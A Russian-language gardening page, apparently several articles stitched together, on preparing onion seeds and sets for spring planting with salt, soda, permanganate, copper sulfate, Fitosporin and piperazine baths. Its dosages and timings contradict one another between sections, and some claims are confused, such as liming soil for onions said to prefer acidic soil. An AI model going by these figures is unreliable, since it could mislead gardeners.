0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как подготовить лук для посадки

Подготовка лука к посадке

Репчатый лук был известен еще в Древнем Египте. Многие народы мира придавали большое внимание этой овощной культуре. До сих пор мало какое блюдо обходится без лука. Его лекарственные свойства известны всем. Столетиями народы собирали тонкости выращивания луковой культуры: как подготовить лук к посадке, где лучше посадить и когда собрать.

Агротехника выращивания лука

Лук считается неприхотливой культурой, но для получения хорошего урожая придется позаботиться о нем.

Существует много видов репчатого овоща. Сорта репки бывают малозачатковые (1-2 головки), среднезачатковые (2-3) и многозачатковые (4-5). Последние еще называют семейными. Будь то сорт с развитием одной луковицы или семейка, особенности их выращивания во многом схожи.

Для выращивания луковиц земля должна быть легкой и питательной. Лучше, если почва будет нейтральной кислотности.

Для формирования луковиц необходим световой день от 13 до 17 часов, в зависимости от сорта. В связи с этим под луковую грядку выделяют просторный, открытый солнцу участок.

Влажность воздуха для роста луковиц не так важна, как влажность почвы. Она не должна быть мокрой. Поливать следует в первую половину вегетации и закладки головок. После того, как луковицы налились, полив прекращают.

Важно! На участках с близким залеганием грунтовых вод к поверхности сажать лук не стоит. Из-за избытка влаги лук будет плохо расти и начнет гнить.

Предшественниками репчатого лука могут быть картофель, капуста, бобовые, томаты и огурцы. После этих культур почва обогащена органическими удобрениями. Только через три года луковую грядку возвращают на прежнее место.

Интересно. Овощ не боится заморозков. Заморозки до -3 С не повредят всходам. Высадку проводят в конце апреля, когда почва прогреется до 10-12 С.

Несмотря на всю простоту в выращивании лука важно знать, как его подготовить к посадке.

Посев семенами

Семенами репчатый лук сажают для получения:

  • лука-севка для дальнейшего выращивания лука-репки;
  • сразу репчатые головки для использования или продажи;
  • зеленого лукового пера ранней весной.

Вне зависимости от желаемых результатов, чернушку необходимо подготовить к посадке. В подготовку входят прогрев семян, обеззараживание и замачивание.

Прогревают семенной материал в горячей воде примерно 50 С. Семена заворачивают в ткань и опускают в горячую воду. Через тридцать минут сверток с семенами вынимают и опускают на одну минуту в холодную воду.

Прогрев лука в теплой воде

Обеззараживание проводится с помощью марганцовки. Делается слабо розовый раствор. Выдерживать семена нужно в течение суток. Также можно использовать фунгицидные препараты, например, фитоспорин.

Чернушка всходит через 20 дней. Чтобы ускорить процесс прорастания, семена замачивают в чуть теплой воде. Из ткани делают мешочек, засыпают в него чернушку и опускают в воду на 30-35 часов.

Важно! За время замачивания воду меняют 3-4 раза.

Набухшие семена тонким слоем распределить по влажной ткани, накрыть. Во влажной среде семена через два дня начнут проклевываться. Чернушку слегка просушивают и смешивают с мелом. При посадке такие семена проще увидеть на грунте.

Подготовленную чернушку сажают и на рассаду. Подросший луковый высадок высаживают на участок в начале мая.

Обработка лука-севка перед посадкой

Для садоводов привычнее сажать лук маленькими луковками – севком. Другое его название – арбажейка. Чаще всего его покупают. Весной проводят подготовку лука к посадке, его обработку перед посадкой. Его разбирают по размерам, очищают от лишних чешуек и первым делом просушивают в теплом проветриваемом помещении. Если севок планируется сажать на зелень, то сухой хвостик на вершине обрезают.

Лук севок перед посадкой следует обработать. Подготовка лука к посадке включает в себя:

Прогревание

Прогревают луковички для уменьшения вероятности выброса стрелок. Делают это в два этапа. Сначала луковки рассыпают тонким слоем и держат при температуре около 20 С. Лучше это делать на солнце, но можно положить наверх шкафов. Потом – при температуре 40-45 С в течение 6-7 часов.

Важно! При просушивании под батареей надо следить за температурой. Нужный температурный режим – не больше 45 С. Лук периодически переворачивают для равномерного прогревания.

Замачивание

После прогревания овсюжку следует запарить в горячей водой (40-45 С) и оставить на 15-20 минут. После этого помещают севок в холодную воду на такое же время. Этот способ не только прогреет луковичный материал, но и закалит его.

Запаривание в горячей воде преследует еще одну цель – не дать луку выпустить стрелку. Прогретый лук быстрее сформирует большую луковицу.

Обеззараживание

Часто овсюжка бывает поражена луковой мухой. Для уничтожения ее личинок посадочный материал надо протравить. Один из способов – замачивание в соляном растворе. Правильный соленый раствор не концентрированный, в литре теплой воды растворяют 1 ст. л. соли. Севок держат в растворе 2-3 часа, после чего промывают чистой водой. Солевая обработка помогает также от клещей и трипс.

Следующая обработка – от грибковых заболеваний. Луковицы замачивают в течение двух часов в слабом растворе марганцовки. Можно замочить севок в растворе медного купороса. Сделать такое средство можно из расчета 30 гр. порошка на 10 литров воды.

Важно! После каждой обработки севок несколько раз промывают чистой водой.

По окончании процедуры обеззараживания луковки просушивают.

Существует способ обеззараживания, при котором посевной материал не только обрабатывается от заболеваний, но и получает подпитку. Это замачивание в растворе древесной золы. На ведро теплой воды должно пойти 250 грамм золы. В полученном растворе лук держат 6-8 минут. После замачивания луковки сушат в теплом месте примерно 2-3 часа. Теперь можно приступать к посадке.

Пиперазин и фитоспорин при обработке лука

В борьбе за будущий урожай поможет фитоспорин. Этот препарат выпускается в виде порошка, пасты и жидкости. Вне зависимости от его вида действие у него одно – предотвратить развитие грибковых и вирусных заболеваний.

Замачивание в растворе фитоспарина – альтернатива обработки семян марганцовкой. Обработка этим препаратом предупредит развитие таких болезней, как мучнистая роса, бактериальная гниль лука, фомоз.Для замачивания севка 10 гр. препарата разводят в ½ литра воды. Арбажейку держат в растворе 6-8 минут.

Важно! При использовании фитоспорина надо придерживаться дозировки, указанной на упаковке.

Против луковой мухи посевной материал обрабатывают раствором пиперазина. Этот препарат заменяет солевой раствор. Пиперазин – средство от глистов, которое дают детям. Его используют не только при обработке севка, но и для борьбы с луковой мухой на грядках.

Для приготовления препарата измельчают 5 таблеток и растворяют их в 10 литрах воды. Держат овсюжку примерно 8 минут.

Подготовка грунта к посеву

Для выращивания лука подойдет открытый солнечный участок. Подготовка грядок начинается еще осенью. После сбора урожая и удаления всех сорняков участок перекапывают на глубину 20 см. В это время вносят органические, фосфорные и калийные удобрения.

Так как лук лучше растет на подкисленных или нейтральных почвах, проводят известкование. На участке тонким слоем распределяют гашеную известь. Проводить процедуру известкования следует каждые 5-6 лет.

Важно! Известкование грунта проводят осенью. Перед посадкой севка этого делать нельзя.

После таяния снега и просыхания грунта гряду под высевание севка перекапывают и вносят на квадратный метр по 15 грамм нитроаммофоски. За неделю до осуществления посева почву надо продезинфицировать. Делается это раствором медного купороса (три чайных ложки на ведро воды).

Кроме извести, с данной задачей справится древесная зола. На квадратный метр вносят 300-400 граммов золы. Она не только понизит кислотность почвы, но и обогатит ее кальцием, калием и фосфором.

Кроме золы, в понижении кислотности поможет обычная сода. При внесении ее в почву раскисление происходит моментально.

Вносить соду в землю можно двумя способами. Первый – распределить соду тонким равномерным слоем по участку, сильно полить и дать впитаться. Второй – готовится раствор из расчета 100 гр. соды на один литр воды. Поливаем раствором грядку и боронуем граблями.

При посадке лука весной можно подготовленную грядку посыпать небольшим количеством соды, перемешать ее с почвой и посадить севок.

Сода для земли – не только раскислитель. Она используется как удобрение. Готовят раствор концентрацией 0,5% для внекорневой подкормки и 3,5% для внесения под корень. Эти растворы не только подкормят растения, но и уберегут их от разнообразной гнили.

При подготовке севка перед посадкой сода тоже может помочь. Растворив одну чайную ложку в литре горячей воды, проводят обеззараживание севка. Температура раствора должна быть 45-50 С. Овсюжку заливают на 30 минут. Такая обработка обладает теми же свойствами, что и замачивание в соляном растворе. Кроме того, благодаря высокой температуре, происходит обработка луковиц против стрелкования.

Залог хорошего урожая лука – если репки закладываются осенью и подкрепляются весной. Только комплекс мероприятий по подготовке грунта, семян и севка приведет к желаемому результату. Процедуры подготовки не требуют больших временных и финансовых затрат. Все препараты есть в любом доме. Каждый новичок сможет открыть для себя секрет, как вырастить богатый урожай крупных и красивых головок лука.

Подготовка лука-севка к посадке весной

Сейчас в продаже можно встретить сорта лука, которые выращиваются через семена и позволяют получить урожай уже в текущем сезоне. Для средней полосы такой метод подходит при условии выращивания через рассаду. Но все же, лучший результат даст посадка традиционным способом – через лук-севок. Конечно, и в этом случае значение имеет правильная подготовка материала, определяющая высокую эффективность метода. Полученный через выращивание лука-севка урожай обычно без потерь хранится всю зиму.

Зачем готовить лук-севок к посадке

Для тех, кто не знает, лук-севок – это однолетние небольшие луковицы, которые были выращены из семян. Их высадка в грунт производится только весной. И к концу сезона получают отличный урожай репчатого лука.

Такой способ посадки применяют преимущественно к острым сортам пряного овоща, которые дольше хранятся. На песчаных почвах вообще невозможно другим способом получить полноценный урожай лука, в этом случае на посадку идет только лук-севок.

Из-за того, что севок содержит запас влаги и питательных веществ в луковицах, ему требуются более редкие поливы и подкормки, чем при выращивании из семян. Корневая система такого лука будет более мощная, а чешуи обладают высокой плотностью, что способствует длительному хранению.

Сажать севок сразу после покупки нельзя. Сначала луковицы хорошо просушивают. Для этого лук раскладывают тонким слоем в сухом теплом помещении.

Внимание! Размещать севок на батарее или обогревателе для просушки нельзя!

Если вы заготавливали лук-севок самостоятельно, его нужно более тщательно подготовить. Храниться он должен при температуре 18-20 градусов. Перед посевом луковицы прогревают в помещении с температурой 30-40 градусов в течение 10часов (этот период времени превышать нельзя). Это делается для активизации ростовых процессов и ускоряет последующее укоренение. Такая процедура одновременно предотвращает возможное стрелкование.

Обработка лука перед посадкой

Если ваш лук-севок правильно хранился, куплен в фирменном магазине, вы уверены, что он ничем не заражен и соблюдаете севооборот – этап замачивания можно и пропустить. Но в некоторых ситуациях без такой подготовки не обойтись.

Разберем более подробно каждый метод обработки лука-севка. Что он даст садоводу и как его правильно применять.

Замачивание в соли

Опытные дачники давно выяснили на практике, что если замочить перед посадкой лук-севок в соленой воде, это:

  • ускорит всхожесть посадочного материала;
  • предотвратит многие болезни;
  • убьет личинки вредителей;
  • поднимет иммунитет растения, что позволит лучше противостоять неблагоприятным условиям выращивания.

Процедура должна проводиться в обязательном порядке. Ее проводят в день посадки, или за сутки до этого.

Для солевой ванночки готовят раствор из 20-30г соли на 2 литра теплой воды. Маленькие луковички погружают в солевой раствор, где выдерживают 3-4 часа. Можно брать как обычную пищевую соль, так и морскую – это никак не скажется на конечном результате. Действие той и иной соли аналогично.

После этого посадочный материал просушивают, разложив в один слой на ткани или листах бумаги. Некоторые заменяют соль пищевой содой, из которой готовят слабо концентрированный раствор, добавляя на 1 литр воды 1,5 ч. ложки соды. Время обработки в этом случае будет составлять 1-2 часа.

Фитоспорине

Препарат содержит бактерии, которые подавляют развитие патогенных микроорганизмов в грунте. Выпускается Фитоспорин в виде сухого порошка, который перед применением разводят в воде согласно инструкции. Его часто используют для предпосадочной обработки не только лука, но и других овощных культур. От вредителей и их личинок Фитоспорин не поможет, но зато оградит от таких заболеваний, как:

  • бактериальная гниль;
  • мучнистая роса;
  • фитофтора;
  • ржавчина.

Разводить препарат необходимо в воде, которая отстаивалась не менее суток, иначе хлор убьет сенную палочку, содержащуюся в Фитоспорине. Полезная бактерия также чувствительна к свету, поэтому обработку препаратом лучше проводить вечером, или в пасмурную погоду.

Для замачивания Фитоспорин разводят из расчета 10-20г на пол литра воды. Севок помещают в раствор на 5-10 минут. Вместо замачивания можно просто опрыскать луковицы приготовленным раствором из распылителя и дать им высохнуть.

Марганцовке

Такая обработка проводится с целью дезинфекции лука-севка. Раствор губительно действует как на споры грибка, так и на болезнетворные бактерии, опасные для многих культур. Способ является доступным, дешевым и эффективным, поэтому до сих пор часто применяется, несмотря на обилие современных препаратов для дезинфекции семян и растений.

Чтобы убить все возможные патогенные микроорганизмы, содержащиеся в луковицах, применяют замачивание материала в растворе, который готовится из 4г марганцовки на 1л теплой воды. В такой ванночке севок выдерживают 2-3 часа, после чего просушивают. Этого времени вполне достаточно, чтобы надежно защитить овощ от болезней и вредителей.

Как правильно посадить лук-севок

Перед посадкой лука-севка недостаточно провести обработку одних лишь луковиц. Земля также требует необходимой подготовки. Для луковой грядки лучше выбрать открытое место, хорошо освещаемое солнечными лучами. Нужно учитывать и то, что эта культура совершенно не выносит излишка влаги, поэтому, чем ниже будут залегать грунтовые воды, тем лучше.

Подготовкой грядки нужно заняться еще осенью. Землю необходимо тщательно взрыхлить и внести туда торф, песок и свежий навоз. Если почва кислая, ее известкуют доломитовой мукой или мелом, чтобы снизить показатель pH до значений, близких к нейтральным. Кислая земля не позволит луку нормально усваивать полезные вещества и развиваться. К тому же, в таком грунте растения легче заболевают ложной мучнистой росой.

Весной удобрения уже не вносятся, иначе лук выпустит перья, в ущерб росту головки. Землю просто рыхлят и сразу приступают к посадке. Севок сажают на гряду после того, как почва полностью прогреется. В средней полосе посадка возможна не раньше начала мая.

Слишком ранние сроки посадки приведут к формированию стрелки в ущерб развития самой луковицы. Но и запаздывать с этим мероприятием нельзя. В этом случае в почве значительно уменьшится содержание влаги и к тому же, луку может не хватить времени для полноценного созревания. Посадка должна состояться не раньше, чем грунт прогреется до +12 градусов.

Сама процедура посадки состоит из следующих этапов:

  • Перед высадкой севка на гряде намечают ряды. Это позволит заранее рассчитать количество посевного материала, которое поместится на данной площади.
  • Луковицы сортируют на крупные и мелкие, высаживать их необходимо отдельно, используя для каждого размера луковок свою схему посадки.
  • Севок, диаметр которого не превышает 1см, сажают на расстоянии 4-5см друг от друга.
  • Для крупных луковок расстояние при посадке увеличивают на 3см.
  • Между рядами следует оставить 20-30см, чтобы облегчить уход за посадками. К тому же в междурядьях можно посадить, например, укроп.
  • Глубоко закапывать луковицы не стоит – это негативно повлияет на процесс прорастания. Их просто втыкают донцем в грунт и слегка прижимают.
  • После посадки землю на грядке мульчируют.

Если сделать все по правилам, луковицам будет хватать места для нормального роста, они не станут мешать друг другу. Посадки будут хорошо проветриваться, уменьшится риск заболеваний. При этом вы сможете рационально использовать площадь своего огорода. Через неделю сквозь мульчу начнет пробиваться зелень, еще через 7-9 дней мульчирующий материал можно будет убрать.

Грядку следует регулярно и тщательно пропалывать от сорняков. Нежелательное соседство с ними вызовет избыток влаги в почве, что может спровоцировать загнивание луковиц. Первую подкормку вносят через 2 недели после посадки, используя настой коровяка. Второй раз грядку удобряют не раньше, чем через 3 недели. Минеральные удобрения можно вносить в виде растворов, или сухими. Делается это 1 раз за сезон.

В первую половину вегетационного периода лук поливают 2 раза в неделю, если нет дождей. С июля растения поливаются реже, чтобы не навредить луковицам, а за 2-3 недели до сбора урожая полив прекращают совсем. После каждого полива землю необходимо рыхлить, облегчая доступ к корням кислорода. На поверхности грядки не должно быть жесткой корки. Когда луковицы начнут наливаться, землю от них надо немного отгрести.

Подготовка и посадка лука севка весной

Супер раствор для посадки лука- севка: видео

Если соблюсти все правила обработки и посадки лука-севка, удастся получить достойный урожай, который будет снабжать вас витаминами всю зиму. Употребление лука защищает организм от различных инфекций, повышает аппетит, улучшает пищеварение. Его используют не только для приготовления различных блюд, но применяют и в рецептах народной медицины.

Как подготовить лук для посадки

При выращивании любой культуры немаловажную роль играет процесс подготовки к посадке, и лук здесь — не исключение. Нужно правильно выбрать участок для высадки, выбрать подходящий семенной материал, обеспечить растениям нормальные условия содержания. Подготовка лука к посадке весной должна проводиться по всем правилам, последовательно и в нужные сроки. Причем не имеет значения, выращиваются ли луковицы на репку или зелень на перо — подготовка важна в обоих случаях.

Подготовка лука к посадке весной

Варианты посадки лука для весеннего выращивания

Существует несколько вариантов посадки лука, каждый из которых обладает своими преимуществами. Но подготовка лука к своевременной посадке отличается в зависимости от выбранного семенного материала и времени высадки. Отличия есть даже у посадочного материала в зависимости от того, пойдет он на репку или на зеленое перо. И вот с этими отличиями и надо разобраться. Сначала надо понять, в какой ситуации используется тот или иной семенной материал для выращивания лука:

  • Использование севка для весеннего выращивания. Подготовка лука-севка к посадке включает в себя протравливание от вредителей и болезней, а также отбор подходящих луковок. И здесь все делается по следующему принципу: севок среднего размера, от 1 до 2 см в диаметре, идет для классического весеннего высаживания, а более крупная луковка пригодится для посадок на зеленое перо.
  • Использование севка для того, чтобы вырастить озимый лук. В этом случае стоит отделить те луковки, которые чаще выбраковываются из-за своего малого размера. Их высаживают осенью, чтобы зимой они ждали под снегом, а весной сразу же пошли в рост.
  • Посадка лука семенами или чернушкой (так еще их называют). Здесь существует три варианта. Первый вариант — это подготовка севка к посадке, после того как он будет выращен из семян. Используется в большинстве случаев. Второй вариант — это выращивание грядок из чернушки, не занимаясь еще и подготовкой лука-севка к посадке. Третий вариант — получение рассады для дальнейшего рассаживания.

Вне зависимости от того, какой именно вариант был выбран, посадочный материал еще надо правильно обработать и подготовить. Сюда входит подготовка почвы для лука, обработка семян или луковок для нормального хранения, своевременная посадка и начальный уход за грядками. Следует помнить, что важен каждый из этапов. Если неправильно выбрать участок для выращивания, грядки просто не взойдут, а без обработки семенного материала он может испортиться еще до того, как окажется в земле.

Если говорить про отбор семенного материала, то здесь есть несколько простых правил. Во-первых, надо отсеивать слишком мягкие луковички, которые не пойдут даже на посадку под зиму и не долежат до весны. Затем — убирать все подгнившие корневища, равно как и подъеденные насекомыми. Те луковицы, которые поражены болезнями или грибками, в принципе желательно отделять и сжигать, а уже после этого — сортировать по размерам, решая, для какого типа высадки они подойдут. Делается это еще до того, как начнутся прочие приготовления.

Хранение семенного материала перед посадкой

До того как будет проведена посадка луковых грядок, огороднику еще нужно сохранить семенной материал до весны. Он должен пролежать осень, зиму и часть весеннего периода. Неизбежно часть луковиц портится и становится непригодной к дальнейшей высадке. Но как подготовить собранный лук-севок для дальнейшего рассаживания на грядке? Во-первых, надо знать определенные отличия данного растения, которые позволяют продлить хранение. А во-вторых, существуют препараты, помогающие сохранить луковицы в неповрежденном виде.

Одну вещь должен запомнить каждый начинающий огородник: длительность и успешность хранения луковиц всегда зависит от того, к какой разновидности они относятся. И здесь стоит запомнить: дольше всего хранятся острые разновидности. Не имеет значения, будет ли овощ использоваться для посадки на зелень или на головку. Вот и выходит, что, например, любимая многими семейка хранится подолгу и без проблем. Сладкие и дорогие сорта обязательно обрабатываются, перед тем как укладываются на хранение.

Сама процедура хранения тоже играет немаловажную роль. Во-первых, надо выбрать подходящее место для хранения. Оно должно быть темным, с низкой влажностью и не слишком холодным. Есть 2 основных способа, которые применяются для хранения лука-севка. Первый — это теплый метод, при котором температура колеблется от 17 до 22°С, а влажность не превышает 70%. При холодном методе температура равна -1-3°С, а влажность не повышает 80%.

Обработка семенного материала для дальнейшего хранения

Для лучшего сохранения семенного материала многие огородники предпочитают обрабатывать его при помощи определенных препаратов. Лучше всего для этих целей подойдет препарат Фитоспорин-М, или аналогичные вещества. Здесь используется слабый раствор: не более 3-4 г на 1 л. Им обрабатывают головку каждой луковицы, чтобы вся поверхность была влажной. После этого перед укладкой на хранение весь севок тщательно просушивают. А вот что пишут на форумах об обработке солью или марганцовкой:

«Теоретически, для того чтобы севок лучше хранился, его можно обработать раствором поваренной соли или марганцовки, но эта обработка не всегда приносит нужные результаты. Эти вещества лучше сработают при вымачивании в них перед самой посадкой, а для длительного хранения лучше подойдет Фитоспорин. Но здесь нужно запомнить еще одну вещь. Чем холоднее зимы в данном регионе, тем проще хранить там севок, хотя дополнительная обработка все равно не будет лишней, так как поможет сохранить дополнительные семена».

Почва для луковых грядок

Еще до того как будет отобран семенной материал, надо обработать грунт в том месте, где будут располагаться луковые грядки. Причем если сажать этот овощ надо весной, то подготовка начинается еще осенью. Сначала надо убрать с участка всю ботву, древесные листья и прочий подобный мусор, мешающий будущему посеву. Если этого не сделать, то урожай может оказаться пораженным различными болезнями и вредителями. Все они способны провести зиму в оставленной на участке органике и проснуться уже весной.

Подготовка почвы для посадки лука включает в себя также своевременную перекопку и внесение удобрений. Перекапывать выбранный участок надо на глубину штыка лопаты, при этом осенью не стоит его дополнительно рыхлить. Чтобы улучшить качества почвы для высадки, стоит ее дополнительно удобрить. Данная культура, как и ряд других овощей, любит фосфор и калий. Но не стоит перебарщивать с удобрениями. Например, суперфосфата на 1 кв. м обычно вносят не более 30-35 г.

Калийных подкормок вносят еще меньше — по 15-20 г на 1 кв. м, в зависимости от рекомендуемой концентрации. Не следует забывать и про азот. Избыток этого элемента в почве приводит к тому, что у лука начинает активнее расти зеленое перо, а луковица становится рыхлой и хуже хранится, хотя это приемлемо при выращивании данной культуры на зелень. Избыток азотсодержащих удобрений нежелателен в любом случае. Кроме минеральных удобрений можно использовать и органику, компост и куриный или кроличий помет.

Как правильно подготовить лук к посадке?

Существуют определенные правила, которые предусматривают, как подготовить лук к посадке весной и осенью. Они касаются не только посевного материала, но и выбора места для грядок, обработки и удобрения почвы. Соблюдение всех требований необходимо для того, чтобы гарантировать правильный рост и развитие растения. Только качественный уход позволит получить запланированный урожай, который сможет оправдать надежды огородника.

Лук возделывается человеком давно. Еще сотни лет назад наши предки знали об удивительных свойствах этой культуры, способной предупреждать и исцелять некоторые заболевания. Фитонциды — особые биологически активные летучие вещества, содержащиеся в луке, оказывают губительное действие на многие бактерии и вирусы, а также стимулируют иммунную систему организма.

Лечебные свойства — не единственное достоинство лука. Его вкус и аромат делают многие блюда особенными. Без этого растения сложно представить современное меню. Будучи натуральной пряностью и одновременно усилителем вкуса природного происхождения, лук завоевал прочные позиции в повседневной и праздничной кухне различных народов мира.

В пищу употребляют не только зелень этой многолетней травянистой овощной культуры, но и так называемую репку. Выращивают растение по-разному, в зависимости от того, какая его часть необходима дачнику. В каждом случае существуют свои секреты обработки посевного материала (семян или луковиц). Определение места для грядок и подготовка почвы тоже имеют свои особенности. Большую роль для качества и количества урожая играет время, выбранное для посадки лука.

Людям известны несколько видов этой овощной культуры: порей, шалот, батун, шнитт, ялтинский, болгарский и индийский декоративный, монгольский, дикорастущий и обыкновенный репчатый. Последний вид наиболее популярен. Это растение достаточно неприхотливо. Все его части активно используются в кулинарии и медицине.

В России его можно встретить повсеместно: и на небольшом дачном участке площадью 6 соток, и на обширных плантациях крупных сельскохозяйственных объединений. Репчатый лук достаточно просто вырастить, если соблюдать несколько простых правил.

Для посадки лука большое значение имеет время года. От этого зависит весь комплекс подготовительных мероприятий. Иногда растение высаживается осенью. Это делают, как правило, для того, чтобы ранней весной получить свежую и сочную зелень, которая после длинной зимы способна украсить любой стол.

Семена для посадки культуры под зиму не подойдут. Во время морозов они просто погибнут в почве и не дадут всходов. Осенью используется другой луковый посевной материал. Чаще всего огородники выбирают для этих целей овсюжку — небольшие луковицы размером менее 1 см. В крайнем случае можно использовать образцы, относящиеся к 1 категории. Их размер составляет 1-1,5 см.

Работа по подготовке почвы к зиме и обработке посевного материала — достаточно трудоемкий процесс. Часть урожая можно потерять из-за морозов или слишком обильного таяния снега весной. Особенно сложно предсказать судьбу озимого лука, высаженного осенью, в районах с суровыми погодными условиями.

К тому же поздняя посадка этой культуры гарантирует только получение зеленой массы. Репка в зимний период истощается и не дает новых луковиц. Поэтому большая часть тех, кто любит ранней весной иметь на своем столе свежие зеленые перья острого растения, предпочитают выращивать его не в открытом грунте, а в теплице или каком-либо помещении в специально приготовленных для этого кадках.

На дачных участках лук высаживают преимущественно весной, когда устанавливается относительно теплая погода, так как эта культура плохо переносит холод. Этот период позволяет достаточно быстро получить неплохой урожай, включающий и зелень, и луковицы, которые будут пригодными не только для употребления в пищу, но и в качестве посевного материала для будущего сезона. Залог успеха — правильный выбор места для грядки и тщательная обработка севка.

Луковичные растения могут размножаться 2 способами: семенами и вегетативно. Второй вариант используют, когда хотят получить урожай этого многолетника быстрее. Размножение культуры с помощью луковиц требует особой подготовки, включающей несколько последовательных действий.

Сначала необходимо перебрать весь имеющийся посевной материал и отложить самые здоровые, сухие и неповрежденные образцы. Они послужат основой для будущих молодых растений. Последующая подготовка лука к посадке предполагает его вымачивание в смесях с питательными веществами, закаливание и сушку.

Огородники пользуются различными методами для обработки луковиц, в зависимости от того, с какой целью их будут высаживать. Если растение необходимо для получения большого количества зеленого пера, технология подготовки посевного материала предельно проста:

  1. 1. Отбирают средние по размеру здоровые луковицы.
  2. 2. Шелуху, которая отслоилась или слишком сильно присохла, снимают. Верхушку срезают чистым ножом.
  3. 3. Луковицы замачивают на 10 часов в растворе комплексных удобрений, подходящих для основных овощных культур. Приготовить его просто. Достаточно купить необходимые минеральные подкормки в специализированном магазине и развести 1 ч. л. состава на ведро воды.
  4. 4. После того как материал высохнет, проводится обработка от луковой мухи. Этот вредитель особенно опасен для данной огородной культуры. Предотвратить гибель будущего урожая можно, положив луковицы в концентрированный солевой раствор на 3 часа. Через положенный промежуток времени части растения, предназначенные для посадки, промываются и сушатся в теплом месте.
  5. 5. Дезинфекция посевного материала от грибковых болезней выполняется с помощью 1% раствора медного купороса или марганцовки. Луковицы вымачивают в одном из составов 2 часа. После финальной сушки культура пригодна для посадки.

Подготовленный таким образом лук весной быстро пускает молодые зеленые перья при условии, что грядка сделана правильно.

Как правильно обработать лук севок перед посадкой от болезней и вредителей: чем и как провести обработку

Подготовка лука севка к посадке весной является обязательной, если посадочный материал был приобретен в садовом магазине или на рынке, не лишним будет проведение процедуры и для севка, выращенного самостоятельно из семян. Это позволит получить хороший урожай и убережет лук от поражений заболеваниями и вредителями.

Подготовка и обработка перед посадкой севка не требует больших усилий. Главное все делать по правилам, описанным в этой статье.

Зачем проводить обработку севка перед посадкой

Предпосевная обработка севка весной нужна для защиты культуры от вредителя и заболевания. Это профилактические мероприятия, которые позволят предупредить заражение, ведь лечить уже пораженное растение гораздо сложнее.

Предпосевная обработки лука позволяет:

  • Стимулировать рост.
  • Уничтожить бактерии при обеззараживании.
  • Усилить иммунитет и сопротивляемость болезням и вредителям.
  • Предупредить загнивание головки лука.
  • Повысить устойчивость к изменениям погоды.

Болезни и вредители

Лук может быть подвержен воздействию различных болезней и вредителей. Причем одни активны во время его хранения, другие – во время вегетации, что существенно влияет на качество и количество урожая. Некоторые болезни и вредители могут нанести непоправимый ущерб урожаю. Лук могут поразить:

  • Ложная мучнистая роса.
  • Шейковая гниль.
  • Церкоспороз.
  • Ржавчина.
  • Луковая моль.
  • Луковая муха.
  • Стеблевая нематода.
  • Совка.
  • Жук скрытнохоботник.

Важно! Главная проблема при выращивании лука – стрелкование. Это естественная фаза развития культуры.

Чем и как обрабатывать севок перед посадкой

Обработка лука севка перед посадкой состоит из нескольких этапов:

Сортировка

Выбирать севок надо в зависимости от климатических и агротехнических особенностей участка, на котором планируется выращивать лук. Лучше выбирать сорта, которые хорошо растут в грунте с умеренной влажностью и средней температурой воздуха.

Если сорт не переносит дожди и перепады температур, то урожайность будет слабой.

Хранят посадочный материал в картонной коробке или холщовом мешочке в помещении с температурой воздуха +12-18 градусов.

Важно! Севок активно прорастает при повышенной влажности и высокой температуре.

  • Севок, который хранился правильно, имеет выраженный луковый запах. Если есть запах плесени или гнили, луковички уничтожают. Они для посадки не подходят.
  • На здоровых луковицах шелуха сухая с характерным шелестом.
  • Если на головке есть влага и темных пятен, это говорит о распространении грибка и плесени. Поврежденные головки надо выбрать и удалить, чтобы они не заразили здоровые.
  • Здоровый севок должен быть твердым и гладким, без повреждений.

За 20-30 дней до высадки севок калибруют:

  • Мелкий — от 10 до 15 мм;
  • Средний — от 15 до 20 мм;
  • Крупный — от 20 до 40 мм.

Совет! Мелкий и средний севок дает высокий урожай. Крупный лук прорастает дольше, его сажают на зелень.

Сортировка даст возможность получить дружные всходы и выбрать здоровый севок.

Прогрев

Чтобы не допустить стрелкования, лук весной прогревают. При хранении посадочного материала дома при температуре от +18 градусов, дополнительный прогрев не нужен. Его достаточно выставить на несколько часов на солнышко, укрыв теплой тканью.

Но приобретенный севок весной надо обязательно прогревать. Прогрев проводят за 3-4 дня до посадки. Его раскладывают в 1 слой возле отопительного прибора, чтобы температура прогревания была в пределах +35-40 градусов. Чтобы луковички не пересушились их накрывают хлопковой тканью. Прогревается лук 10-70 часов.

Если времени мало можно залить сенчик горячей водой на 15 минут, а потом полить холодной. Такая экспресс обработка избавит от стрелкования, но и продлит сроки их формирования.

Закаливание

Закаливание позволит улучшить сопротивляемость лука болезням и снизить вероятность стрелкования. Закаленные головки дольше хранятся и становятся более твердыми.

Процедуру проводят в начале весны. На Юге – в конце февраля, в средней полосе России — в конце марта.

Сухие здоровые луковицы раскладывают в ящик и отправляют на 10 суток в погреб или на верхнюю полку холодильника. Главное, чтобы они находились при температуре от 0 до +8 градусов. После севок переносят в тепло.

Совет! Эффективна экспресс закалка. Головки после замачивания перед посадкой поливают ледяной водой, просушивают и прогревают на солнце.

Замачивание

Улучшить иммунитет позволит замачивание. Рецептов для данной процедуры много, поэтому каждый подберет свой.

Солевой раствор позволит уберечь лук от луковой мухи, трипсов и клещей.

Марганцовка эффективна против грибковых спор. Слабый раствор позволяет уничтожить, главное держать в нем лук необходимое время.

Для ускорения прорастания севка 3-6 дней его обрабатывают стимулятором роста Циркон, Эпин, Гумат, Энерген.

Рассмотрим подробнее способы.

От вредителей и болезней

Севок для посадки можно купить или вырастить из семян чернушки. Визуально нельзя понять, есть в нем грибковые споры и другие вредные бактерии. Поэтому рекомендуется провести обеззараживание севка.

Каждое средство поможет справиться с этой задачей. У них есть свои плюсы и минусы, которые надо учитывать.

Марганцовка

Применяют 3 вида раствора марганцовки для обеззараживания севка:

Слабый раствор слабо действует на микроорганизмы, но зато не портит посевной материал.

Огородники рекомендуют применять раствор средней консистенции, который эффективно уничтожает грибок и плесень, но не вредит севку.

Сильный раствор применяют для обработки севка, зараженного мучнистой росой или луковой мухой. После него севок приобретает темный цвет.

Слабым раствором марганцовки поливают и щелочную почву на грядках, а вот кислую землю марганцовка испортит.

Поваренная соль

Позволяет усилить иммунитет и уничтожить в севке вредных бактерий. Для приготовления раствора в ведре воды растворяют 5-6 ст. ложек соли. В него на 4-5 часов помещают севок. Более слабой солевой водой поливают грядки для обеззараживания.

Важно! Не стоит добавлять много соли или часто использовать это средство. Он защищает культуру от болезней, но портит грунт на долгое время. Рекомендуется применять средство разово.

Солевой раствор особенно эффективен от стеблевой нематоды, трипсов и клещей.

Самым простым методом является обработка севка пищевой содой. В 1 л теплой воды растворяют 1 ч. л. соды и выдерживают в растворе лук 2 часа. Далее севок просушивают.

